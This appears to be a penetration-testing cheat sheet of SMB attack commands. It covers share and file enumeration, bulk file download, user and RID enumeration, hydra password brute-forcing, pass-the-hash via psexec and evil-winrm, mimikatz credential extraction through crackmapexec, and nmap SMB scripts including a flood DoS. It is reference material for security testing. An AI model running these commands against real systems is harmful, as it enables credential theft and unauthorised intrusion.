Disclaimer: This material is provided solely for educational purposes.
You are fully responsible for how
you use the information.
We
do not encourage any kind of illegal or harmful activity.
Introduction
Server Message Block (SMB) is a network file sharing protocol that provides access to shared files and printers on a local network. Older versions of SMB tend to be vulnerable to major exploits, such as EternalBlue.
| Category |
Information Gained |
| Users and groups / shares |
List of users and groups, details of shared resources |
| Operating system information |
OS version, system configuration, installed updates |
| Password policies / Password hashes |
Password strength requirements, password expiration settings, hashed passwords |
| Privileges / Permissions |
User and group permissions, administrative rights |
| Available shares |
Network shares, access permissions, shared directories |
Listing SMB Shares
| Command |
Description |
netexec smb [IP-ADDRESS] -u '[USERNAME]' -p '[PASSWORD]' --shares |
List shares using specified username and password |
netexec smb [IP-ADDRESS] -u guest -p '' --shares |
List shares using guest access with no password |
smbclient -N -L //[IP-ADDRESS] |
List shares with Null session authentication. |
crackmapexec smb [IP-ADDRESS] -u '' -p '' --shares |
List shares with Null session authentication. |
Tips & Tricks
If the Admin$ SMB share has read and write permissions, you can run psexec to establish a connection to the target Windows machine
Enumerating SMB Files
| Command |
Description |
netexec smb [IP-ADDRESS] -u [USERNAME] -p [PASSWORD] -M spider_plus |
Enumerates all files in a specified share using netexec with the spider_plus module. |
crackmapexec smb [IP-ADDRESS] -u [USERNAME] -p [PASSWORD] -M spider_plus --shares 'Specific Share' then cat /tmp/cme_spider_plus/[IP-ADDRESS].json \| jq '. \| map_values(keys)' |
Enumerates all files in a specified share using CrackMapExec with the spider_plus module. |
smbclient //[IP-ADDRESS]/[SHARE] -N |
Connects to an SMB share using null authentication. |
smbclient //[IP-ADDRESS]/[SHARE] -U [USERNAME] [PASSWORD] |
Connects to an SMB share with the specified username and password. |
smbclient.py '[DOMAIN]/[USERNAME]:[PASSWORD]@[IP/HOST] -k -no-pass |
Connects to an SMB share using Kerberos authentication. |
Tips & Tricks
If the IPC$ share is accessible, it enables us to brute-force RIDs (Usernames).
Smbclient Commands to Download All Files
| Command |
Description |
smbclient //[IP-ADDRESS]/[SHARE] -U [USERNAME] |
Connect to the SMB share at specified IP and share name. |
mask "" |
Clear any existing file mask to match all files. |
recurse |
Enable recursive mode to include subdirectories. |
prompt |
Disable interactive mode to avoid prompts for each file. |
mget * |
Download all files and directories from the share to the current directory. |
User Enumeration
| Description |
Command |
| Enumerate users |
crackmapexec smb [TARGET-IP] -u 'user' -p 'PASS' --users |
| Perform RID Bruteforce to get users |
crackmapexec smb [TARGET-IP] -u 'user' -p 'PASS' --rid-brute |
| Enumerate domain groups |
crackmapexec smb [TARGET-IP] -u 'user' -p 'PASS' --groups |
| Enumerate local users |
crackmapexec smb [TARGET-IP] -u 'user' -p 'PASS' --local-users |
Brute-Forcing SMB Credentials
| Scenario |
Command |
| Unknown User |
hydra -L user.txt -p "Password" -f [TARGET-IP] smb |
| Unknown Password |
hydra -l user -P /opt/rockyou.txt -f [TARGET-IP] smb |
| Unknown User and Password |
hydra -L user.txt -P /opt/rockyou.txt -f [TARGET-IP] smb |
| With Domain |
hydra -l user -P /opt/rockyou.txt -f -m Domain [TARGET-IP] smb |
Pass the Hash Techniques
| Technique |
Command |
| psexec |
crackmapexec smb [TARGET-IP] -u '[USERNAME]' -d '[DOMAIN]' -H ':[NTLM-HASH]' --shares |
| psexec (impacket) |
impacket-psexec -hashes ":[NTLM-HASH]" [DOMAIN].local/[USERNAME]@[TARGET-IP] |
| CME |
evil-winrm -i [TARGET-IP] -u [USERNAME] -H [NTLM-HASH] |
CrackMapExec Commands
| Command |
Description |
crackmapexec smb -L |
Lists available SMB shares and their permissions. |
crackmapexec [TARGET-IP] -u [USERNAME] -H [NTLM-HASH] --local-auth |
Accesses SMB shares through local authentication with an NTLM hash. |
crackmapexec smb --gen-relay-list smb-targets.txt [IP-ADDRESS/RANGE] |
|
crackmapexec smb [IP-ADDRESS] -u '[USERNAME]' -p '[PASSWORD]' -x 'net group "Domain Admins" /domain' |
Executes Windows commands over SMB to list Domain Admins. |
crackmapexec smb [IP-ADDRESS/RANGE] -u '[USERNAME]' -p '[PASSWORD]' --local-auth -M mimikatz |
Executes Mimikatz to extract credentials from SMB targets in the specified subnet. |
crackmapexec smb [TARGET-IP] -u '[USERNAME]' -p '[PASSWORD]' --pass-pol |
Extracts password policies |
Nmap Enumeration Commands
| Nmap Script |
Description |
nmap --script smb-* -p 139,445 [TARGET-IP] |
Executes all SMB-related Nmap scripts against the specified IP address for a broad assessment. |
nmap --script smb-enum-* -p 139,445 [TARGET-IP] |
Executes all SMB enumeration scripts for detailed information on shares, users, sessions, etc. |
nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse [TARGET-IP] |
Enumerates shares and user accounts on the target SMB server using specific NSE scripts. |
List of Nmap SMB Scripts
| Script Name |
Explanation |
smb-brute.nse |
Performs brute-force password auditing against SMB servers. |
smb-enum-domains.nse |
Enumerates domains on an SMB server. |
smb-enum-groups.nse |
Enumerates groups on an SMB server. |
smb-enum-processes.nse |
Lists all processes on an SMB server. |
smb-enum-services.nse |
Lists all services on an SMB server. |
smb-enum-sessions.nse |
Enumerates active sessions on an SMB server. |
smb-enum-shares.nse |
Enumerates shared folders on an SMB server. |
smb-enum-users.nse |
Enumerates users on an SMB server. |
smb-flood.nse |
Performs a DoS (Denial of Service) against SMB by flooding it with bogus data. |
smb-ls.nse |
Lists files and directories on an SMB share. |
smb-mbenum.nse |
Enumerates Windows systems in the workgroup or domain using the browser service. |
smb-os-discovery.nse |
Attempts to discover the operating system version and build number over SMB. |
smb-print-text.nse |
Prints a text file on a remote shared printer. |
smb-protocols.nse |
Lists supported SMB protocols (SMB1, SMB2, SMB3) by the target server. |
smb-psexec.nse |
Executes commands on a remote system using SMB and PsExec. |
smb-security-mode.nse |
Checks the security mode (e.g., authentication level) of the SMB server. |
smb-server-stats.nse |
Retrieves server statistics, such as bytes transferred and file counts. |
smb-system-info.nse |
Gathers system information from the SMB server, including OS details, domain, and system uptime. |